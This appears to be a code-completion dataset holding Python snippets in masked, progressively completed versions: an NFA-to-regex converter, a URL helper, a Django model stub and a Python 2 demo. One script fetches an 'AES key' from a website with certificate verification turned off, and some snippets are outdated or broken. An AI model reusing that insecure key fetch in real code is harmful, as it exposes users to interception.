def __init__(self, nfa):
if type(nfa) is not NFA:
raise AutomataError('Can create a NetworkNFA only from an NFA.')
if all([(len(i) == 1) for i in nfa.charset]):
self._charset = copy(nfa._charset)
else:
self._charset = set([('{%s}' % i) for i in nfa._charset])
self._nodes = copy(nfa._nodes)
self._deltas = copyDeltas(nfa._deltas)
self._start = nfa._start
self._terminals = copy(nfa._terminals)
def addDelta(self, node, input, dest):
if set(input) - self._charset.union(set('()+*')):
raise AutomataError('%s contains symbols not in charset.' % input)
if type(node) is Node:
if type(dest) is set and all([(type(i) is Node) for i in dest]):
if len(dest):
if node in self._deltas:
if input in self._deltas[node]:
self._deltas[node][input] = self._deltas[node][
input].union(dest)
else:
self._deltas[node][input] = dest
else:
self._deltas[node] = {input: dest}
elif type(dest) is Node:
if node in self._deltas:
if input in self._deltas[node]:
self._deltas[node][input].add(dest)
else:
self._deltas[node][input] = set([dest])
else:
self._deltas[node] = {input: set([dest])}
else:
raise AutomataError(
'Delta destination must be a Node or a set of nodes, not %s.'
% type(dest).__name__)
else:
raise AutomataError('Delta source must be Node, not %s.' % type
(node).__name__)
def remDelta(self, node, input):
if set(input) - self._charset.union(set('()+*')):
raise AutomataError('%s contains symbols not in charset.' % input)
if type(node) is Node:
if node in self._deltas and input in self._deltas[node]:
self._deltas[node].pop(input)
if len(self._deltas[node]) == 0:
del self._deltas[node]
else:
raise AutomataError('Delta source must be a Node, not %s' %
type(node).__name__)
def isValid(self):
if len(self._nodes) == 0:
return False
if self._start not in self._nodes:
return False
for i in self._terminals:
if i not in self._nodes:
return False
if not set(self._deltas.keys()).issubset(self._nodes):
return False
for key in self._deltas:
for char in self._deltas[key]:
if set(char) - self._charset.union(set('()+*')):
return False
return True
def apply(self, input, start):
raise AutomataError('NetworkNFA does not allow direct application.')
def __repr__(self):
ret = '<NetworkNFA>\n'
ret += ' Charset: {%s}\n' % ','.join(filter(None, self._charset))
ret += ' Nodes: {%s}\n' % ','.join([i.label for i in self._nodes])
ret += 'Terminals: {%s}\n' % ','.join([i.label for i in self.
_terminals])
ret += ' Start: %s\n' % (self._start and self._start.label)
ret += ' Delta: '
if len(self._deltas):
for qFrom in self._deltas:
for input in self._deltas[qFrom]:
ret += 'D(%s, %s) -> {%s}\n ' % (qFrom.label,
input or 'lambda', ','.join([i.label for i in self.
_deltas[qFrom][input]]))
ret = ret.rstrip() + '\n'
else:
ret += 'None\n'
ret += ' Valid: %s\n' % ('Yes' if self.isValid() else 'No')
ret += '</NetworkNFA>'
return ret
<mask token>
| <mask token>
def copyDeltas(src):
out = dict()
for k in src:
out[k] = dict()
for k2 in src[k]:
out[k][k2] = copy(src[k][k2])
return out
def replaceNode(nfa, old, new):
if DEBUG:
print('R_Start(%s, %s) ---' % (old, new), nfa)
if old in nfa._deltas:
for input in nfa._deltas[old]:
nfa.addDelta(new, input, nfa._deltas[old][input])
del nfa._deltas[old]
if DEBUG:
print('R_SwitchedSource(%s, %s) ---' % (old, new), nfa)
deltas_temp = copyDeltas(nfa._deltas)
for src in deltas_temp:
for input in deltas_temp[src]:
if old in deltas_temp[src][input]:
nfa._deltas[src][input].remove(old)
nfa._deltas[src][input].add(new)
if DEBUG:
print('R_SwitchedDest(%s, %s) ---' % (old, new), nfa)
<mask token>
class NetworkNFA(NFA):
def __init__(self, nfa):
if type(nfa) is not NFA:
raise AutomataError('Can create a NetworkNFA only from an NFA.')
if all([(len(i) == 1) for i in nfa.charset]):
self._charset = copy(nfa._charset)
else:
self._charset = set([('{%s}' % i) for i in nfa._charset])
self._nodes = copy(nfa._nodes)
self._deltas = copyDeltas(nfa._deltas)
self._start = nfa._start
self._terminals = copy(nfa._terminals)
def addDelta(self, node, input, dest):
if set(input) - self._charset.union(set('()+*')):
raise AutomataError('%s contains symbols not in charset.' % input)
if type(node) is Node:
if type(dest) is set and all([(type(i) is Node) for i in dest]):
if len(dest):
if node in self._deltas:
if input in self._deltas[node]:
self._deltas[node][input] = self._deltas[node][
input].union(dest)
else:
self._deltas[node][input] = dest
else:
self._deltas[node] = {input: dest}
elif type(dest) is Node:
if node in self._deltas:
if input in self._deltas[node]:
self._deltas[node][input].add(dest)
else:
self._deltas[node][input] = set([dest])
else:
self._deltas[node] = {input: set([dest])}
else:
raise AutomataError(
'Delta destination must be a Node or a set of nodes, not %s.'
% type(dest).__name__)
else:
raise AutomataError('Delta source must be Node, not %s.' % type
(node).__name__)
def remDelta(self, node, input):
if set(input) - self._charset.union(set('()+*')):
raise AutomataError('%s contains symbols not in charset.' % input)
if type(node) is Node:
if node in self._deltas and input in self._deltas[node]:
self._deltas[node].pop(input)
if len(self._deltas[node]) == 0:
del self._deltas[node]
else:
raise AutomataError('Delta source must be a Node, not %s' %
type(node).__name__)
def isValid(self):
if len(self._nodes) == 0:
return False
if self._start not in self._nodes:
return False
for i in self._terminals:
if i not in self._nodes:
return False
if not set(self._deltas.keys()).issubset(self._nodes):
return False
for key in self._deltas:
for char in self._deltas[key]:
if set(char) - self._charset.union(set('()+*')):
return False
return True
def apply(self, input, start):
raise AutomataError('NetworkNFA does not allow direct application.')
def __repr__(self):
ret = '<NetworkNFA>\n'
ret += ' Charset: {%s}\n' % ','.join(filter(None, self._charset))
ret += ' Nodes: {%s}\n' % ','.join([i.label for i in self._nodes])
ret += 'Terminals: {%s}\n' % ','.join([i.label for i in self.
_terminals])
ret += ' Start: %s\n' % (self._start and self._start.label)
ret += ' Delta: '
if len(self._deltas):
for qFrom in self._deltas:
for input in self._deltas[qFrom]:
ret += 'D(%s, %s) -> {%s}\n ' % (qFrom.label,
input or 'lambda', ','.join([i.label for i in self.
_deltas[qFrom][input]]))
ret = ret.rstrip() + '\n'
else:
ret += 'None\n'
ret += ' Valid: %s\n' % ('Yes' if self.isValid() else 'No')
ret += '</NetworkNFA>'
return ret
<mask token>
| <mask token>
def copyDeltas(src):
out = dict()
for k in src:
out[k] = dict()
for k2 in src[k]:
out[k][k2] = copy(src[k][k2])
return out
def replaceNode(nfa, old, new):
if DEBUG:
print('R_Start(%s, %s) ---' % (old, new), nfa)
if old in nfa._deltas:
for input in nfa._deltas[old]:
nfa.addDelta(new, input, nfa._deltas[old][input])
del nfa._deltas[old]
if DEBUG:
print('R_SwitchedSource(%s, %s) ---' % (old, new), nfa)
deltas_temp = copyDeltas(nfa._deltas)
for src in deltas_temp:
for input in deltas_temp[src]:
if old in deltas_temp[src][input]:
nfa._deltas[src][input].remove(old)
nfa._deltas[src][input].add(new)
if DEBUG:
print('R_SwitchedDest(%s, %s) ---' % (old, new), nfa)
<mask token>
class NetworkNFA(NFA):
def __init__(self, nfa):
if type(nfa) is not NFA:
raise AutomataError('Can create a NetworkNFA only from an NFA.')
if all([(len(i) == 1) for i in nfa.charset]):
self._charset = copy(nfa._charset)
else:
self._charset = set([('{%s}' % i) for i in nfa._charset])
self._nodes = copy(nfa._nodes)
self._deltas = copyDeltas(nfa._deltas)
self._start = nfa._start
self._terminals = copy(nfa._terminals)
def addDelta(self, node, input, dest):
if set(input) - self._charset.union(set('()+*')):
raise AutomataError('%s contains symbols not in charset.' % input)
if type(node) is Node:
if type(dest) is set and all([(type(i) is Node) for i in dest]):
if len(dest):
if node in self._deltas:
if input in self._deltas[node]:
self._deltas[node][input] = self._deltas[node][
input].union(dest)
else:
self._deltas[node][input] = dest
else:
self._deltas[node] = {input: dest}
elif type(dest) is Node:
if node in self._deltas:
if input in self._deltas[node]:
self._deltas[node][input].add(dest)
else:
self._deltas[node][input] = set([dest])
else:
self._deltas[node] = {input: set([dest])}
else:
raise AutomataError(
'Delta destination must be a Node or a set of nodes, not %s.'
% type(dest).__name__)
else:
raise AutomataError('Delta source must be Node, not %s.' % type
(node).__name__)
def remDelta(self, node, input):
if set(input) - self._charset.union(set('()+*')):
raise AutomataError('%s contains symbols not in charset.' % input)
if type(node) is Node:
if node in self._deltas and input in self._deltas[node]:
self._deltas[node].pop(input)
if len(self._deltas[node]) == 0:
del self._deltas[node]
else:
raise AutomataError('Delta source must be a Node, not %s' %
type(node).__name__)
def isValid(self):
if len(self._nodes) == 0:
return False
if self._start not in self._nodes:
return False
for i in self._terminals:
if i not in self._nodes:
return False
if not set(self._deltas.keys()).issubset(self._nodes):
return False
for key in self._deltas:
for char in self._deltas[key]:
if set(char) - self._charset.union(set('()+*')):
return False
return True
def apply(self, input, start):
raise AutomataError('NetworkNFA does not allow direct application.')
def __repr__(self):
ret = '<NetworkNFA>\n'
ret += ' Charset: {%s}\n' % ','.join(filter(None, self._charset))
ret += ' Nodes: {%s}\n' % ','.join([i.label for i in self._nodes])
ret += 'Terminals: {%s}\n' % ','.join([i.label for i in self.
_terminals])
ret += ' Start: %s\n' % (self._start and self._start.label)
ret += ' Delta: '
if len(self._deltas):
for qFrom in self._deltas:
for input in self._deltas[qFrom]:
ret += 'D(%s, %s) -> {%s}\n ' % (qFrom.label,
input or 'lambda', ','.join([i.label for i in self.
_deltas[qFrom][input]]))
ret = ret.rstrip() + '\n'
else:
ret += 'None\n'
ret += ' Valid: %s\n' % ('Yes' if self.isValid() else 'No')
ret += '</NetworkNFA>'
return ret
def nfa2regex(nfa):
if not nfa.isValid():
raise AutomataError(
'NFA must be in a valid state to be converted to a regex.')
network = NetworkNFA(nfa)
if DEBUG:
print('START', network)
start = Node('qs')
network.addNode(start)
network.addDelta(start, '', network.start)
network.start = start
end = Node('qf')
network.addNode(end)
for i in network.terminals:
network.addDelta(i, '', end)
network.remTerminal(i)
network.addTerminal(end)
if DEBUG:
print('Dummies added: ', network)
for src in network.nodes:
delta_temp = network.getDelta(src)
for dest in network.nodes:
chars = []
for input in delta_temp:
if input and dest in delta_temp[input]:
chars.append(input)
if len(chars):
for c in chars:
delta_temp[c].remove(dest)
if len(delta_temp[c]) == 0:
del delta_temp[c]
if len(chars) > 1:
chars = '(' + '+'.join(chars) + ')'
else:
chars = '+'.join(chars)
network.addDelta(src, chars, dest)
if DEBUG:
print('Collapsed: ', network)
pliableNodes = list(network.nodes)
pliableNodes.remove(network.start)
for n in network.terminals:
pliableNodes.remove(n)
nodeFinalDist = {}
maxDist = len(network.nodes) ** len(network.nodes)
for n in network.nodes:
nodeFinalDist[n] = maxDist
nodeFinalDist[network.terminals[0]] = 0
toProcess = list(network.nodes)
toProcess.remove(network.terminals[0])
while len(toProcess):
for node in toProcess:
dests = network.getDelta(node).values()
if len(dests) == 0:
dests = set([])
else:
dests = reduce(set.union, network.getDelta(node).values())
if len(dests) == 0:
toProcess.remove(node)
else:
minDist = min([nodeFinalDist[i] for i in dests])
if minDist != maxDist:
nodeFinalDist[node] = minDist + 1
toProcess.remove(node)
pliableNodes.sort(key=lambda x: nodeFinalDist[x], reverse=True)
if DEBUG:
print('Pliables: ', pliableNodes)
for node in pliableNodes:
network.remNode(node)
delta = copy(network.getDelta(node))
loops = []
for input in delta:
if node in delta[input]:
if len(input):
loops.append(input)
loopRegex = '+'.join(loops)
if len(loopRegex) > 1 and not (loopRegex[0] == '(' and loopRegex[-1
] == ')'):
loopRegex = '(' + loopRegex + ')*'
elif len(loopRegex) >= 1:
loopRegex = loopRegex + '*'
for input in copy(delta):
if delta[input] == set([node]):
del delta[input]
elif node in delta[input]:
delta[input].remove(node)
if '' in delta and (len(delta) != 1 or len(delta['']) != 1):
eligible = []
for dest in delta['']:
delta_temp = network.getDelta(dest)
if '' in delta_temp and node in delta_temp['']:
eligible.append(dest)
if len(eligible):
replaceNode(network, node, eligible[0])
continue
try:
del network._deltas[node]
except KeyError:
continue
if DEBUG:
print('Working on connections: ', node, delta)
deltas_temp = copyDeltas(network._deltas)
for src in deltas_temp:
for input in deltas_temp[src]:
tempDeltaDest = network.getDelta(src)[input]
if node in tempDeltaDest:
tempDeltaDest.remove(node)
if len(tempDeltaDest) == 0:
network.remDelta(src, input)
for input2 in delta:
for dest in delta[input2]:
if not (src == dest and input + loopRegex +
input2 == ''):
network.addDelta(src, input + loopRegex +
input2, dest)
if DEBUG:
print('New Delta:', src, input,
loopRegex, input2, dest, network)
branches = network.getDelta(network.start).keys()
if len(branches) == 1:
regex = branches[0]
else:
prefix = commonprefix(branches)
suffix = commonsuffix(branches)
branches = [(i[len(prefix):-len(suffix)] if len(suffix) else i[len(
prefix):]) for i in branches]
branches.sort(key=len)
if len(prefix) or len(suffix):
regex = prefix + '(' + '+'.join([(i or LAMBDA) for i in branches]
) + ')' + suffix
else:
regex = '+'.join([(i or LAMBDA) for i in branches]) or PHI
return regex
| from util import AutomataError
from automata import NFA
from base import Node
from copy import copy, deepcopy
from os.path import commonprefix
DEBUG = False
LAMBDA = u'λ'
PHI = u'Ø'
def copyDeltas(src):
out = dict()
for k in src:
out[k] = dict()
for k2 in src[k]:
out[k][k2] = copy(src[k][k2])
return out
def replaceNode(nfa, old, new):
if DEBUG:
print('R_Start(%s, %s) ---' % (old, new), nfa)
if old in nfa._deltas:
for input in nfa._deltas[old]:
nfa.addDelta(new, input, nfa._deltas[old][input])
del nfa._deltas[old]
if DEBUG:
print('R_SwitchedSource(%s, %s) ---' % (old, new), nfa)
deltas_temp = copyDeltas(nfa._deltas)
for src in deltas_temp:
for input in deltas_temp[src]:
if old in deltas_temp[src][input]:
nfa._deltas[src][input].remove(old)
nfa._deltas[src][input].add(new)
if DEBUG:
print('R_SwitchedDest(%s, %s) ---' % (old, new), nfa)
def commonsuffix(seq):
def reverse(s):
out = ''
for c in reversed(s):
out += c
return out
seq = [reverse(i) for i in seq]
return reverse(commonprefix(seq))
class NetworkNFA(NFA):
def __init__(self, nfa):
if type(nfa) is not NFA:
raise AutomataError('Can create a NetworkNFA only from an NFA.')
if all([(len(i) == 1) for i in nfa.charset]):
self._charset = copy(nfa._charset)
else:
self._charset = set([('{%s}' % i) for i in nfa._charset])
self._nodes = copy(nfa._nodes)
self._deltas = copyDeltas(nfa._deltas)
self._start = nfa._start
self._terminals = copy(nfa._terminals)
def addDelta(self, node, input, dest):
if set(input) - self._charset.union(set('()+*')):
raise AutomataError('%s contains symbols not in charset.' % input)
if type(node) is Node:
if type(dest) is set and all([(type(i) is Node) for i in dest]):
if len(dest):
if node in self._deltas:
if input in self._deltas[node]:
self._deltas[node][input] = self._deltas[node][
input].union(dest)
else:
self._deltas[node][input] = dest
else:
self._deltas[node] = {input: dest}
elif type(dest) is Node:
if node in self._deltas:
if input in self._deltas[node]:
self._deltas[node][input].add(dest)
else:
self._deltas[node][input] = set([dest])
else:
self._deltas[node] = {input: set([dest])}
else:
raise AutomataError(
'Delta destination must be a Node or a set of nodes, not %s.'
% type(dest).__name__)
else:
raise AutomataError('Delta source must be Node, not %s.' % type
(node).__name__)
def remDelta(self, node, input):
if set(input) - self._charset.union(set('()+*')):
raise AutomataError('%s contains symbols not in charset.' % input)
if type(node) is Node:
if node in self._deltas and input in self._deltas[node]:
self._deltas[node].pop(input)
if len(self._deltas[node]) == 0:
del self._deltas[node]
else:
raise AutomataError('Delta source must be a Node, not %s' %
type(node).__name__)
def isValid(self):
if len(self._nodes) == 0:
return False
if self._start not in self._nodes:
return False
for i in self._terminals:
if i not in self._nodes:
return False
if not set(self._deltas.keys()).issubset(self._nodes):
return False
for key in self._deltas:
for char in self._deltas[key]:
if set(char) - self._charset.union(set('()+*')):
return False
return True
def apply(self, input, start):
raise AutomataError('NetworkNFA does not allow direct application.')
def __repr__(self):
ret = '<NetworkNFA>\n'
ret += ' Charset: {%s}\n' % ','.join(filter(None, self._charset))
ret += ' Nodes: {%s}\n' % ','.join([i.label for i in self._nodes])
ret += 'Terminals: {%s}\n' % ','.join([i.label for i in self.
_terminals])
ret += ' Start: %s\n' % (self._start and self._start.label)
ret += ' Delta: '
if len(self._deltas):
for qFrom in self._deltas:
for input in self._deltas[qFrom]:
ret += 'D(%s, %s) -> {%s}\n ' % (qFrom.label,
input or 'lambda', ','.join([i.label for i in self.
_deltas[qFrom][input]]))
ret = ret.rstrip() + '\n'
else:
ret += 'None\n'
ret += ' Valid: %s\n' % ('Yes' if self.isValid() else 'No')
ret += '</NetworkNFA>'
return ret
def nfa2regex(nfa):
if not nfa.isValid():
raise AutomataError(
'NFA must be in a valid state to be converted to a regex.')
network = NetworkNFA(nfa)
if DEBUG:
print('START', network)
start = Node('qs')
network.addNode(start)
network.addDelta(start, '', network.start)
network.start = start
end = Node('qf')
network.addNode(end)
for i in network.terminals:
network.addDelta(i, '', end)
network.remTerminal(i)
network.addTerminal(end)
if DEBUG:
print('Dummies added: ', network)
for src in network.nodes:
delta_temp = network.getDelta(src)
for dest in network.nodes:
chars = []
for input in delta_temp:
if input and dest in delta_temp[input]:
chars.append(input)
if len(chars):
for c in chars:
delta_temp[c].remove(dest)
if len(delta_temp[c]) == 0:
del delta_temp[c]
if len(chars) > 1:
chars = '(' + '+'.join(chars) + ')'
else:
chars = '+'.join(chars)
network.addDelta(src, chars, dest)
if DEBUG:
print('Collapsed: ', network)
pliableNodes = list(network.nodes)
pliableNodes.remove(network.start)
for n in network.terminals:
pliableNodes.remove(n)
nodeFinalDist = {}
maxDist = len(network.nodes) ** len(network.nodes)
for n in network.nodes:
nodeFinalDist[n] = maxDist
nodeFinalDist[network.terminals[0]] = 0
toProcess = list(network.nodes)
toProcess.remove(network.terminals[0])
while len(toProcess):
for node in toProcess:
dests = network.getDelta(node).values()
if len(dests) == 0:
dests = set([])
else:
dests = reduce(set.union, network.getDelta(node).values())
if len(dests) == 0:
toProcess.remove(node)
else:
minDist = min([nodeFinalDist[i] for i in dests])
if minDist != maxDist:
nodeFinalDist[node] = minDist + 1
toProcess.remove(node)
pliableNodes.sort(key=lambda x: nodeFinalDist[x], reverse=True)
if DEBUG:
print('Pliables: ', pliableNodes)
for node in pliableNodes:
network.remNode(node)
delta = copy(network.getDelta(node))
loops = []
for input in delta:
if node in delta[input]:
if len(input):
loops.append(input)
loopRegex = '+'.join(loops)
if len(loopRegex) > 1 and not (loopRegex[0] == '(' and loopRegex[-1
] == ')'):
loopRegex = '(' + loopRegex + ')*'
elif len(loopRegex) >= 1:
loopRegex = loopRegex + '*'
for input in copy(delta):
if delta[input] == set([node]):
del delta[input]
elif node in delta[input]:
delta[input].remove(node)
if '' in delta and (len(delta) != 1 or len(delta['']) != 1):
eligible = []
for dest in delta['']:
delta_temp = network.getDelta(dest)
if '' in delta_temp and node in delta_temp['']:
eligible.append(dest)
if len(eligible):
replaceNode(network, node, eligible[0])
continue
try:
del network._deltas[node]
except KeyError:
continue
if DEBUG:
print('Working on connections: ', node, delta)
deltas_temp = copyDeltas(network._deltas)
for src in deltas_temp:
for input in deltas_temp[src]:
tempDeltaDest = network.getDelta(src)[input]
if node in tempDeltaDest:
tempDeltaDest.remove(node)
if len(tempDeltaDest) == 0:
network.remDelta(src, input)
for input2 in delta:
for dest in delta[input2]:
if not (src == dest and input + loopRegex +
input2 == ''):
network.addDelta(src, input + loopRegex +
input2, dest)
if DEBUG:
print('New Delta:', src, input,
loopRegex, input2, dest, network)
branches = network.getDelta(network.start).keys()
if len(branches) == 1:
regex = branches[0]
else:
prefix = commonprefix(branches)
suffix = commonsuffix(branches)
branches = [(i[len(prefix):-len(suffix)] if len(suffix) else i[len(
prefix):]) for i in branches]
branches.sort(key=len)
if len(prefix) or len(suffix):
regex = prefix + '(' + '+'.join([(i or LAMBDA) for i in branches]
) + ')' + suffix
else:
regex = '+'.join([(i or LAMBDA) for i in branches]) or PHI
return regex
| from util import AutomataError
from automata import NFA
from base import Node
from copy import copy, deepcopy
from os.path import commonprefix
DEBUG = False
LAMBDA = u'\u03bb'
PHI = u'\u00d8'
def copyDeltas(src):
out = dict()
for k in src:
out[k] = dict()
for k2 in src[k]:
out[k][k2] = copy(src[k][k2])
return out
def replaceNode(nfa, old, new):
if DEBUG:
print('R_Start(%s, %s) ---' % (old, new), nfa)
if old in nfa._deltas:
for input in nfa._deltas[old]:
nfa.addDelta(new, input, nfa._deltas[old][input])
del nfa._deltas[old]
if DEBUG:
print('R_SwitchedSource(%s, %s) ---' % (old, new), nfa)
deltas_temp = copyDeltas(nfa._deltas)
for src in deltas_temp:
for input in deltas_temp[src]:
if old in deltas_temp[src][input]:
nfa._deltas[src][input].remove(old)
nfa._deltas[src][input].add(new)
if DEBUG:
print('R_SwitchedDest(%s, %s) ---' % (old, new), nfa)
def commonsuffix(seq):
def reverse(s):
out = ''
for c in reversed(s):
out += c
return out
seq = [reverse(i) for i in seq]
return reverse(commonprefix(seq))
class NetworkNFA(NFA):
def __init__(self, nfa):
if type(nfa) is not NFA:
raise AutomataError('Can create a NetworkNFA only from an NFA.')
if all([len(i) == 1 for i in nfa.charset]):
self._charset = copy(nfa._charset)
else:
self._charset = set(['{%s}' % i for i in nfa._charset])
self._nodes = copy(nfa._nodes)
self._deltas = copyDeltas(nfa._deltas)
self._start = nfa._start
self._terminals = copy(nfa._terminals)
def addDelta(self, node, input, dest):
if set(input) - (self._charset.union(set('()+*'))):
raise AutomataError('%s contains symbols not in charset.' % input)
if type(node) is Node:
if type(dest) is set and all([type(i) is Node for i in dest]):
if len(dest):
if node in self._deltas:
if input in self._deltas[node]:
self._deltas[node][input] = self._deltas[node][input].union(
dest)
else:
self._deltas[node][input] = dest
else:
self._deltas[node] = {input: dest}
elif type(dest) is Node:
if node in self._deltas:
if input in self._deltas[node]:
self._deltas[node][input].add(dest)
else:
self._deltas[node][input] = set([dest])
else:
self._deltas[node] = {input: set([dest])}
else:
raise AutomataError(
'Delta destination must be a Node or a set of nodes, not %s.' % type(dest).__name__)
else:
raise AutomataError(
'Delta source must be Node, not %s.' % type(node).__name__)
def remDelta(self, node, input):
if set(input) - (self._charset.union(set('()+*'))):
raise AutomataError('%s contains symbols not in charset.' % input)
if type(node) is Node:
if node in self._deltas and input in self._deltas[node]:
self._deltas[node].pop(input)
if len(self._deltas[node]) == 0:
del self._deltas[node]
else:
raise AutomataError(
'Delta source must be a Node, not %s' % type(node).__name__)
def isValid(self):
if len(self._nodes) == 0:
return False
if self._start not in self._nodes:
return False
for i in self._terminals:
if i not in self._nodes:
return False
if not set(self._deltas.keys()).issubset(self._nodes):
return False
for key in self._deltas:
for char in self._deltas[key]:
if set(char) - (self._charset.union(set('()+*'))):
return False
return True
def apply(self, input, start):
raise AutomataError('NetworkNFA does not allow direct application.')
def __repr__(self):
ret = '<NetworkNFA>\n'
ret += ' Charset: {%s}\n' % ','.join(filter(None, self._charset))
ret += ' Nodes: {%s}\n' % ','.join([i.label for i in self._nodes])
ret += 'Terminals: {%s}\n' % ','.join(
[i.label for i in self._terminals])
ret += ' Start: %s\n' % (self._start and self._start.label)
ret += ' Delta: '
if len(self._deltas):
for qFrom in self._deltas:
for input in self._deltas[qFrom]:
ret += 'D(%s, %s) -> {%s}\n ' % (qFrom.label, input or 'lambda', ','.join(
[i.label for i in self._deltas[qFrom][input]]))
ret = ret.rstrip() + '\n'
else:
ret += 'None\n'
ret += ' Valid: %s\n' % ('Yes' if self.isValid() else 'No')
ret += '</NetworkNFA>'
return ret
def nfa2regex(nfa):
if not nfa.isValid():
raise AutomataError(
'NFA must be in a valid state to be converted to a regex.')
network = NetworkNFA(nfa)
if DEBUG:
print('START', network)
# Take care of multi-terminals
# if len(network.terminals) > 1:
## end = Node('qf')
# network.addNode(end)
# for i in copy(network.terminals):
## network.addDelta(i, '', end)
# network.remTerminal(i)
# network.addTerminal(end)
# Add a dummy start and end nodes
start = Node('qs')
network.addNode(start)
network.addDelta(start, '', network.start)
network.start = start
end = Node('qf')
network.addNode(end)
for i in network.terminals:
network.addDelta(i, '', end)
network.remTerminal(i)
network.addTerminal(end)
if DEBUG:
print('Dummies added: ', network)
# Collapse connections
for src in network.nodes:
delta_temp = network.getDelta(src)
for dest in network.nodes:
chars = []
for input in delta_temp:
if input and dest in delta_temp[input]:
chars.append(input)
if len(chars):
for c in chars:
delta_temp[c].remove(dest)
if len(delta_temp[c]) == 0:
del delta_temp[c]
if len(chars) > 1:
chars = '(' + '+'.join(chars) + ')'
else:
chars = '+'.join(chars)
network.addDelta(src, chars, dest)
if DEBUG:
print('Collapsed: ', network)
# Collect pliable nodes
pliableNodes = list(network.nodes)
pliableNodes.remove(network.start)
for n in network.terminals:
pliableNodes.remove(n)
# Build a distance-from-terminal table
nodeFinalDist = {}
maxDist = len(network.nodes) ** len(network.nodes) # Lazy
for n in network.nodes:
nodeFinalDist[n] = maxDist
nodeFinalDist[network.terminals[0]] = 0
toProcess = list(network.nodes)
toProcess.remove(network.terminals[0])
while len(toProcess):
for node in toProcess:
dests = network.getDelta(node).values()
if len(dests) == 0:
dests = set([])
else:
dests = reduce(set.union, network.getDelta(node).values())
if len(dests) == 0:
toProcess.remove(node)
else:
minDist = min([nodeFinalDist[i] for i in dests])
if minDist != maxDist:
nodeFinalDist[node] = minDist + 1
toProcess.remove(node)
# Sort pliable nodes by distance from terminal
pliableNodes.sort(key=lambda x: nodeFinalDist[x], reverse=True)
if DEBUG:
print('Pliables: ', pliableNodes)
for node in pliableNodes:
# Remove Node
network.remNode(node)
# Save delta
delta = copy(network.getDelta(node))
# Convert loops to regex
loops = []
for input in delta:
if node in delta[input]:
if len(input):
loops.append(input)
loopRegex = '+'.join(loops)
if len(loopRegex) > 1 and not (loopRegex[0] == '(' and loopRegex[-1] == ')'):
loopRegex = '(' + loopRegex + ')*'
elif len(loopRegex) >= 1:
loopRegex = loopRegex + '*'
# Remove loops
for input in copy(delta):
if delta[input] == set([node]):
del delta[input]
elif node in delta[input]:
delta[input].remove(node)
# Search lambda-closure equivalence
if '' in delta and (len(delta) != 1 or len(delta['']) != 1):
eligible = []
for dest in delta['']:
delta_temp = network.getDelta(dest)
if '' in delta_temp and node in delta_temp['']:
eligible.append(dest)
if len(eligible):
replaceNode(network, node, eligible[0])
continue
# Remove delta
try:
del network._deltas[node]
except KeyError: # No deltas remaining, had only loops
continue
if DEBUG:
print('Working on connections: ', node, delta)
# Check all possible connections through this node
deltas_temp = copyDeltas(network._deltas)
for src in deltas_temp:
for input in deltas_temp[src]:
tempDeltaDest = network.getDelta(src)[input]
if node in tempDeltaDest:
tempDeltaDest.remove(node)
if len(tempDeltaDest) == 0:
network.remDelta(src, input)
for input2 in delta:
for dest in delta[input2]:
if not (src == dest and (input + loopRegex + input2) == ''):
network.addDelta(
src, input + loopRegex + input2, dest)
if DEBUG:
print('New Delta:', src, input,
loopRegex, input2, dest, network)
# Extract common prefix/suffix
branches = network.getDelta(network.start).keys()
if len(branches) == 1:
regex = branches[0]
else:
prefix = commonprefix(branches)
suffix = commonsuffix(branches)
branches = [i[len(prefix):-len(suffix)] if len(suffix) else i[len(prefix):]
for i in branches]
branches.sort(key=len)
if len(prefix) or len(suffix):
regex = prefix + \
'(' + '+'.join([i or LAMBDA for i in branches]) + ')' + suffix
else:
regex = '+'.join([i or LAMBDA for i in branches]) or PHI
return regex
| [
8,
9,
10,
13,
14
] |
95 | aa579025cacd11486a101b2dc51b5ba4997bf84a | <mask token>
| class UrlPath:
<mask token>
| class UrlPath:
@staticmethod
def combine(*args):
result = ''
for path in args:
result += path if path.endswith('/') else '{}/'.format(path)
return result
| class UrlPath:
@staticmethod
def combine(*args):
result = ''
for path in args:
result += path if path.endswith('/') else '{}/'.format(path)
#result = result[:-1]
return result | null | [
0,
1,
2,
3
] |
96 | a1304f290e0346e7aa2e22d9c2d3e7f735b1e8e7 |
# We don't need no stinking models but django likes this file to be there if you are an app
| null | null | null | [
0,
1
] |
|
97 | 368e209f83cc0cade81791c8357e01e7e3f940c8 | <mask token>
| <mask token>
urllib3.disable_warnings()
<mask token>
print(key.decode('ascii'))
| <mask token>
urllib3.disable_warnings()
response = requests.get('https://freeaeskey.xyz', verify=False)
data = response.text.encode('utf-8')
key = data[data.index(b'<b>') + 3:data.index(b'</b>')]
print(key.decode('ascii'))
| import requests
import urllib3
urllib3.disable_warnings()
response = requests.get('https://freeaeskey.xyz', verify=False)
data = response.text.encode('utf-8')
key = data[data.index(b'<b>') + 3:data.index(b'</b>')]
print(key.decode('ascii'))
| #!/usr/bin/python3
import requests
import urllib3
urllib3.disable_warnings()
response = requests.get('https://freeaeskey.xyz', verify=False)
data = response.text.encode('utf-8')
key = data[data.index(b'<b>')+3:data.index(b'</b>')]
print(key.decode('ascii'))
| [
0,
1,
2,
3,
4
] |
98 | 57516a17c1f3ee208076852369999d74dbb2b3ba | def helloWorld():
print "We are in DEMO land!"
def listBuilder():
    b = []
    for x in range(5):
        b.append(10 * x)
    return b
# listBuilder must be defined before the loop calls it,
# otherwise the first iteration raises a NameError.
for i in range(10):
    helloWorld()
    print listBuilder()
print "[done, for real]"
| null | null | null | null | [
0
] |
99 | 174f744b641ee20272713fa2fe1991cb2c76830a | <mask token>
| <mask token>
class Brokerage(models.Model):
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
| <mask token>
class Brokerage(models.Model):
BrokerageName = models.CharField(max_length=500)
ReviewLink = models.CharField(max_length=1000)
ContactLink = models.CharField(max_length=1000)
TotalAgents = models.IntegerField()
Location = models.CharField(max_length=500)
Desks = models.IntegerField()
YearlyCosts = models.DecimalField(max_digits=12, decimal_places=2)
CommisionSplit = models.CharField(max_length=8)
Cap = models.DecimalField(max_digits=12, decimal_places=2)
TrainingPerWeek = models.IntegerField()
Onboarding = models.BooleanField()
Mentorship = models.BooleanField()
Teams_Hiring = models.BooleanField()
Marketing = models.CharField(max_length=500)
TotalListings = models.IntegerField()
ConferenceRooms = models.BooleanField()
OfficeLeaders = models.CharField(max_length=500)
| from django.db import models
class Brokerage(models.Model):
BrokerageName = models.CharField(max_length=500)
ReviewLink = models.CharField(max_length=1000)
